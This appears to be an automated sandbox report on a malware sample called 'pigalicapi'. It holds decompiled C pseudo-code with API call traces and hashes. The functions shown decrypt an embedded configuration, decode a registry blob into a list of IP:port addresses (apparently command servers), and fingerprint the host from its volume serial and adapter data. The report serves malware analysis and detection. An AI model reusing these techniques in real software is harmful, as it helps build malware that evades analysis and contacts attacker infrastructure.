Part of subcall function 00414330: free.MSVCRT ref: 0041448D
Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1

abort.MSVCRT ref: 004104E4

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Current$Thread$AtomCreateHandleMutexProcessValue$CloseDuplicateEventFindObjectPriorityReleaseSingleWaitabortfprintffreemallocmemcpystrlen
String ID:
API String ID: 1502871514-0
Opcode ID: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
Instruction ID: 67e3bcb8228b950fd08ff0cec122396874fc9c7fbf7ab65224cae0d0026a9d18
Opcode Fuzzy Hash: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
Instruction Fuzzy Hash: 3B51E8B0A04705DFD720EF69D54835ABBF0BB48304F40892EE99597351D7B8A489CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 024E4096 Relevance: 15.1, APIs: 10, Instructions: 121
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E4096() {
				void _t92;
				void* _t114;
				void* _t161;
				void* _t163;
				void* _t166;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
						break;
					}
					L2:
					EnterCriticalSection(_t161 - 0x28);
					if( *(_t161 - 0x30) != 0) {
						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
						 *(_t161 - 0x30) = 0;
						 *(_t161 - 0x2c) = 0;
					}
					_t171 =  *(_t161 - 0x34);
					if( *(_t161 - 0x34) != 0) {
						TerminateThread( *(_t161 - 0x34), 0);
						 *(_t161 - 0x34) = 0;
					}
					ResetEvent( *(_t161 - 0x10));
					LeaveCriticalSection(_t161 - 0x28);
					_t92 = CreateThread(0, 0, E024E4AC0, _t161 - 0x34, 0, 0); // executed
					 *(_t161 - 0x34) = _t92;
					 *(_t161 - 0x64) = E024E97A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
					E024E7D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
					_t166 = _t163 + 0x10;
					 *(_t161 - 0x60) = 0;
					L8:
					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
						E024E7D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
						_t166 = _t166 + 0xc;
						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
						 *(_t161 - 0x58) =  *(_t161 + 8);
						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
						} else {
							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
						}
						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
						_t114 = CreateThread(0, 0, E024E4BA0, _t161 - 0x58, 0, 0); // executed
						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
					}
					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
						 *(_t161 - 1) = 1;
					}
					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
						TerminateThread( *(_t161 - 0x34), 0);
					}
					L17:
					EnterCriticalSection(_t161 - 0x28);
					if( *(_t161 - 0x30) != 0) {
						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
						 *(_t161 - 0x30) = 0;
						 *(_t161 - 0x2c) = 0;
					}
					L19:
					LeaveCriticalSection(_t161 - 0x28);
					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
					E024E97C0( *(_t161 - 0x68));
					if(( *(_t161 - 1) & 0x000000ff) == 0) {
						L21:
						continue;
					}
					break;
				}
				L22:
				DeleteCriticalSection(_t161 - 0x28);
				return  *(_t161 - 1);
			}

0x024e4096
0x024e4096
0x024e4096
0x024e409c
0x024e40a5
0x00000000
0x00000000
0x024e40ab
0x024e40af
0x024e40b9
0x024e40c6
0x024e40cc
0x024e40d3
0x024e40d3
0x024e40da
0x024e40de
0x024e40e6
0x024e40ec
0x024e40ec
0x024e40f7
0x024e4101
0x024e4118
0x024e411e
0x024e413d
0x024e4143
0x024e4153
0x024e4158
0x024e415b
0x00000000
0x024e416d
0x024e417f
0x024e418e
0x024e4193
0x024e4199
0x024e419f
0x024e41a5
0x024e41af
0x024e41bb
0x024e41d2
0x024e41bd
0x024e41c7
0x024e41c7
0x024e41e3
0x024e41f7
0x024e4203
0x024e420c
0x024e4216
0x024e416a
0x024e416a
0x024e422d
0x024e4242
0x024e4249
0x024e424b
0x024e424b
0x024e425e
0x024e4265
0x024e426d
0x024e426d
0x024e4273
0x024e4277
0x024e4281
0x024e428e
0x024e4294
0x024e429b
0x024e429b
0x024e42a2
0x024e42a6
0x024e42af
0x024e42b6
0x024e42c4
0x024e42c8
0x00000000
0x024e42c8
0x00000000
0x024e42c4
0x024e42cd
0x024e42d1
0x024e42dd

APIs

EnterCriticalSection.KERNEL32(?,?), ref: 024E40AF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E40C6
TerminateThread.KERNEL32(00000000,00000000), ref: 024E40E6
ResetEvent.KERNEL32(00000000), ref: 024E40F7
LeaveCriticalSection.KERNEL32(?), ref: 024E4101
CreateThread.KERNEL32 ref: 024E4118
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 024E41DD
CreateThread.KERNEL32 ref: 024E41F7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 024E420C
FindCloseChangeNotification.KERNEL32(?), ref: 024E4216
DeleteCriticalSection.KERNEL32(?,?), ref: 024E42D1

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
String ID:
API String ID: 371823443-0
Opcode ID: 6a06577cfc4b8724774d613e5b8d72df953c5c598b58251112c4e6d6b59030ce
Instruction ID: 85acc2d04e182e693dcd6db047a24370ce84ebf86c9cd3238b1d2a2b06560e74
Opcode Fuzzy Hash: 6a06577cfc4b8724774d613e5b8d72df953c5c598b58251112c4e6d6b59030ce
Instruction Fuzzy Hash: 1D51C5B5E40308EFEF18DF94D899BADBBB2BB48705F10451AF506AB280D770A950CF50

Uniqueness

Uniqueness Score: -1.00%

Function 024E4510 Relevance: 13.7, APIs: 9, Instructions: 173
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E4510(intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				char _v780;
				void* _v784;
				char _v1308;
				long _v1312;
				void* _v1316;
				long _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				signed int _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				void* _t90;
				void* _t94;
				int _t97;
				signed char _t101;
				signed char _t114;
				void* _t153;
				void* _t155;
				void* _t156;

				_v5 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L24:
					return _v5;
				} else {
					E024E7D20(E024E7D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
					_t155 = _t153 + 0x18;
					GetModuleFileNameA(0,  &_v1308, 0x208);
					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v784 = _t90;
					if(_v784 == 0xffffffff) {
						goto L24;
					}
					_v1312 = GetFileSize(_v784, 0);
					if(_v1312 == 0) {
						L22:
						if(_v784 != 0) {
							CloseHandle(_v784);
						}
						goto L24;
					}
					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
					_v1316 = _t94;
					if(_v1316 == 0) {
						goto L22;
					}
					_v1320 = 0;
					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
					if(_t97 == 0 || _v1320 != _v1312) {
						L20:
						if(_v1316 != 0) {
							VirtualFree(_v1316, 0, 0x8000);
							_v1316 = 0;
						}
						goto L22;
					} else {
						FindCloseChangeNotification(_v784); // executed
						_v784 = 0;
						_t101 = E024E47F0(_v1316, _v1312, _a8); // executed
						_t156 = _t155 + 0xc;
						if((_t101 & 0x000000ff) == 0) {
							if(_v1316 != 0) {
								VirtualFree(_v1316, 0, 0x8000); // executed
								_v1316 = 0;
							}
							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
							_v1332 = 0;
							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
								} else {
									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
								}
								_v1340 = _v1344;
								_t114 = E024E47F0(_v1336, _v1340, _a8); // executed
								_t156 = _t156 + 0xc;
								if((_t114 & 0x000000ff) == 0) {
									_v1332 = _v1332 + 1;
									continue;
								} else {
									_v5 = 1;
									goto L20;
								}
							}
							goto L20;
						}
						_v5 = 1;
						goto L20;
					}
				}
			}

0x024e451a
0x024e4522
0x024e47e6
0x024e47ed
0x024e4532
0x024e4556
0x024e455b
0x024e456c
0x024e458b
0x024e4591
0x024e459e
0x00000000
0x00000000
0x024e45b3
0x024e45c0
0x024e47d0
0x024e47d7
0x024e47e0
0x024e47e0
0x00000000
0x024e47d7
0x024e45d6
0x024e45dc
0x024e45e9
0x00000000
0x00000000
0x024e45ef
0x024e4617
0x024e461f
0x024e47a9
0x024e47b0
0x024e47c0
0x024e47c6
0x024e47c6
0x00000000
0x024e4637
0x024e463e
0x024e4644
0x024e4660
0x024e4665
0x024e466d
0x024e467f
0x024e468f
0x024e4695
0x024e4695
0x024e46a8
0x024e46c2
0x024e46c8
0x024e46e3
0x024e470f
0x024e473b
0x024e476b
0x024e473d
0x024e4750
0x024e4750
0x024e4777
0x024e478f
0x024e4794
0x024e479c
0x024e46dd
0x00000000
0x024e479e
0x024e479e
0x00000000
0x024e479e
0x024e479c
0x00000000
0x024e46e3
0x024e466f
0x00000000
0x024e466f
0x024e461f

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 024E456C
CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E458B
GetFileSize.KERNEL32(000000FF,00000000), ref: 024E45AD
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E45D6
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E4617
FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E463E

Part of subcall function 024E47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E482A
Part of subcall function 024E47F0: GetLastError.KERNEL32 ref: 024E4834
Part of subcall function 024E47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E4850
Part of subcall function 024E47F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E48EB
Part of subcall function 024E47F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 024E490B
Part of subcall function 024E47F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E493C
Part of subcall function 024E47F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 024E496F
Part of subcall function 024E47F0: CryptDestroyKey.ADVAPI32(00000000), ref: 024E4982

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E468F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E47C0
CloseHandle.KERNEL32(00000000), ref: 024E47E0

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
String ID:
API String ID: 2585753175-0
Opcode ID: 4e657b7cc6765704a58a30b61fda9fb009c45d718484927567a8f85faf6a8dfa
Instruction ID: eea633371916205c97d5e5c52975af300c8ad3c159cb75f7d56bce2357941d03
Opcode Fuzzy Hash: 4e657b7cc6765704a58a30b61fda9fb009c45d718484927567a8f85faf6a8dfa
Instruction Fuzzy Hash: 4F817C74901A28DBEF24CB54DC95BAAB7B5AF49306F0091CAE509AB2C1D7749BC1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 024E9D20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E024E9D20(intOrPtr _a4, CHAR* _a8, int _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v292;
				intOrPtr _v296;
				char _v404;
				long _v408;
				char _v673;
				char _v676;
				intOrPtr _v680;
				long _v684;
				signed int _v688;
				short* _v692;
				signed int _v696;
				unsigned int _v700;
				intOrPtr _v704;
				char _v900;
				signed int _v904;
				signed int _v908;
				int _v912;
				int _t71;
				void* _t74;
				short** _t76;
				void* _t114;

				_v5 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
					_v12 = 0x20;
					_v24 = 6;
					_v684 = 0;
					_v20 = 0;
					_v408 = 0;
					_v16 = 0x19660d;
					_v296 = 0x3c6ef35f;
					_v680 = _a4;
					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
						_v673 = 0;
						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
						if(_t71 != 0) {
							_v688 = 0xffffffff;
							E024E7D20(_t71,  &_v900, 0, 0xc0);
							_v700 = 0;
							_t74 = E024E9F70( &_v900, 0xc0,  &_v700); // executed
							if(_t74 != 0) {
								_v904 = 0;
								while(_v904 < _v700 >> 2) {
									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
									_v904 = _v904 + 1;
								}
							}
							_v696 = _v684;
							_v908 = 0;
							while(_v908 < 4) {
								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
								_v908 = _v908 + 1;
							}
							_t76 =  &_v692;
							__imp__StringFromCLSID(_a4, _t76); // executed
							_v704 = _t76;
							if(_v704 >= 0) {
								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
								_v5 = 1;
							}
							__imp__CoTaskMemFree(_v692);
						}
					}
				}
				return _v5;
			}

0x024e9d29
0x024e9d31
0x024e9d4b
0x024e9d52
0x024e9d59
0x024e9d63
0x024e9d6a
0x024e9d74
0x024e9d7b
0x024e9d88
0x024e9da2
0x024e9da8
0x024e9ddd
0x024e9de5
0x024e9deb
0x024e9e03
0x024e9e0b
0x024e9e28
0x024e9e32
0x024e9e34
0x024e9e4f
0x024e9e73
0x024e9e49
0x024e9e49
0x024e9e4f
0x024e9e81
0x024e9e87
0x024e9ea2
0x024e9ecf
0x024e9ee4
0x024e9e9c
0x024e9e9c
0x024e9eec
0x024e9ef7
0x024e9efd
0x024e9f0a
0x024e9f2b
0x024e9f46
0x024e9f4c
0x024e9f4c
0x024e9f57
0x024e9f57
0x024e9de5
0x024e9da2
0x024e9f63

APIs

GetSystemDirectoryA.KERNEL32 ref: 024E9D9A
GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 024E9DDD

Part of subcall function 024E9F70: GetAdaptersInfo.IPHLPAPI(00000000,024E9E2D), ref: 024E9FEB

StringFromCLSID.OLE32(00000020,?), ref: 024E9EF7
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 024E9F25
lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 024E9F46
CoTaskMemFree.OLE32(?), ref: 024E9F57

Strings

, xrefs: 024E9D4B

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
String ID:
API String ID: 2697952880-3916222277
Opcode ID: e68404204ebd1b7abe26fe086759a0ce0ca836a08e784390c928e1be594dd20d
Instruction ID: 41d8e0a7f374c9e0d9b625bc6202f0c4c460fd6b669aea19184babd3caa7192c
Opcode Fuzzy Hash: e68404204ebd1b7abe26fe086759a0ce0ca836a08e784390c928e1be594dd20d
Instruction Fuzzy Hash: 935128719013289FEF25DF54CD88BEAB7B9BF44305F1482DAE51A6A280DB709B84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 024E1390 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E1390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed char* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				long _v24;
				void* _v28;
				long _v32;
				signed int _t52;
				signed int _t57;
				intOrPtr _t64;
				void* _t76;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t107;

				_t52 = __eax;
				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
					return _t52 | 0xffffffff;
				} else {
					_v24 = 0;
					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
					_v28 = _t57;
					if(_v28 != 0) {
						E024E7B70(_v28, _a4, _a8);
						E024E7B70(_v28 + _a8, "====", 4);
						_t106 = _t104 + 0x18;
						_v8 = _v28;
						_v20 = 3;
						while(_v20 == 3) {
							_v32 = 0;
							while(_v32 < 4) {
								while( *_v8 != 0x3d) {
									_t76 = E024E1500( *_v8 & 0x000000ff);
									_t106 = _t106 + 4;
									if(_t76 >= 0) {
										break;
									}
									_v8 =  &(_v8[1]);
								}
								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
								_v8 =  &(_v8[1]);
								_v32 = _v32 + 1;
							}
							_t64 = E024E1580( &_v16,  &_v12);
							_t107 = _t106 + 8;
							_v20 = _t64;
							if(_a16 >= _v20) {
								E024E7B70(_a12,  &_v12, _v20);
								_t106 = _t107 + 0xc;
								_a12 = _a12 + _v20;
								_a16 = _a16 - _v20;
								_v24 = _v24 + _v20;
								continue;
							}
							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
						}
						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
						return _v24;
					}
					return _t57 | 0xffffffff;
				}
			}

0x024e1390
0x024e139a
0x00000000
0x024e13b6
0x024e13b6
0x024e13cd
0x024e13d3
0x024e13da
0x024e13f0
0x024e1406
0x024e140b
0x024e1411
0x024e1414
0x024e141b
0x024e1425
0x024e1437
0x024e143d
0x024e144f
0x024e1454
0x024e1459
0x00000000
0x00000000
0x024e1461
0x024e1461
0x024e146e
0x024e1478
0x024e1434
0x024e1434
0x024e1485
0x024e148a
0x024e148d
0x024e1496
0x024e14bc
0x024e14c1
0x024e14ca
0x024e14d3
0x024e14dc
0x00000000
0x024e14dc
0x00000000
0x024e14ab
0x024e14f1
0x00000000
0x024e14f7
0x00000000
0x024e13dc

APIs

GetProcessHeap.KERNEL32(00000008,-00000005), ref: 024E13C6
RtlAllocateHeap.NTDLL(00000000), ref: 024E13CD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E149E
HeapFree.KERNEL32(00000000), ref: 024E14A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E14EA
RtlFreeHeap.NTDLL(00000000), ref: 024E14F1

Strings

====, xrefs: 024E13FA

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Heap$Process$Free$Allocate
String ID: ====
API String ID: 168621272-1026985228
Opcode ID: f5ef825581df7626d06cffd0bb99f6cc131e6e019da16b8e56003559abec25be
Instruction ID: e7073fda1d388c70cb8edf0e1afdbc3286338002d90f7857b00f83c8601f02b2
Opcode Fuzzy Hash: f5ef825581df7626d06cffd0bb99f6cc131e6e019da16b8e56003559abec25be
Instruction Fuzzy Hash: DE415CB5D40209DBEF04CF94D884BAEBBB5BF4430AF10861BE51AA7380D3309A55CF51

Uniqueness

Uniqueness Score: -1.00%

Function 024E7970 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E024E7970(intOrPtr* _a4) {
				long _v8;
				void* _v12;
				int _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _t50;
				intOrPtr _t52;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t72;
				intOrPtr _t83;
				void* _t96;
				void* _t97;
				void* _t98;

				_v8 = 0;
				if(_a4 != 0) {
					_v16 = 0x8c;
					_v20 = 0x75bc;
					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
					_v12 = _t50;
					if(_v12 != 0) {
						_t72 =  *0x24ee28c; // 0x24f3f88
						_t83 =  *0x24f18a0; // 0x24f3b88
						_t52 = E024EA400(_t83, _t72, _v12, 0x75bc); // executed
						_t97 = _t96 + 0x10;
						_v24 = _t52;
						if(_v24 >= 0x92) {
							_v28 = _v24 - 0x8c;
							_t58 = E024E8A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x24f30e8, 0x254);
							_t98 = _t97 + 0x18;
							if(_t58 != 0) {
								_v32 = _v12 + 0x8c;
								_v36 = _v28 / 6;
								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
								if(_v40 != 0) {
									_v48 = 0;
									while(_v48 < _v36) {
										_t64 = E024E7B70( &_v44, _v48 * 6 + _v32, 4);
										_push(_v44);
										L024EB1EC();
										_v52 = _t64;
										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
										_t98 = _t98 + 0x20;
										_v8 = _v8 + 1;
										_v48 = _v48 + 1;
									}
									 *_a4 = _v40;
								}
							}
						}
						VirtualFree(_v12, 0, 0x8000); // executed
					}
				}
				return _v8;
			}

0x024e7976
0x024e7981
0x024e7987
0x024e798e
0x024e79a3
0x024e79a9
0x024e79b0
0x024e79bf
0x024e79c6
0x024e79cd
0x024e79d2
0x024e79d5
0x024e79df
0x024e79ed
0x024e7a10
0x024e7a15
0x024e7a1a
0x024e7a29
0x024e7a38
0x024e7a51
0x024e7a58
0x024e7a5a
0x024e7a6c
0x024e7a84
0x024e7a8f
0x024e7a90
0x024e7a95
0x024e7abc
0x024e7ac2
0x024e7acb
0x024e7a69
0x024e7a69
0x024e7ad6
0x024e7ad6
0x024e7a58
0x024e7a1a
0x024e7ae3
0x024e7ae3
0x024e79b0
0x024e7aef

APIs

VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 024E79A3

Part of subcall function 024EA400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 024EA45C
Part of subcall function 024EA400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 024EA480
Part of subcall function 024EA400: RegCloseKey.KERNEL32(00000000), ref: 024EA494

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E7AE3

Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8AD3
Part of subcall function 024E8A70: GetLastError.KERNEL32 ref: 024E8ADD
Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8B0C
Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 024E8B37
Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8B5E
Part of subcall function 024E8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8B7A
Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B87
Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B91
Part of subcall function 024E8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8B9D

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E7A4B
inet_ntoa.WS2_32(?), ref: 024E7A90
wnsprintfA.SHLWAPI ref: 024E7ABC

Strings

%s:%u, xrefs: 024E7AAB
Hogerfazwafx, xrefs: 024E79C5

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
String ID: %s:%u$Hogerfazwafx
API String ID: 1891311255-1052426064
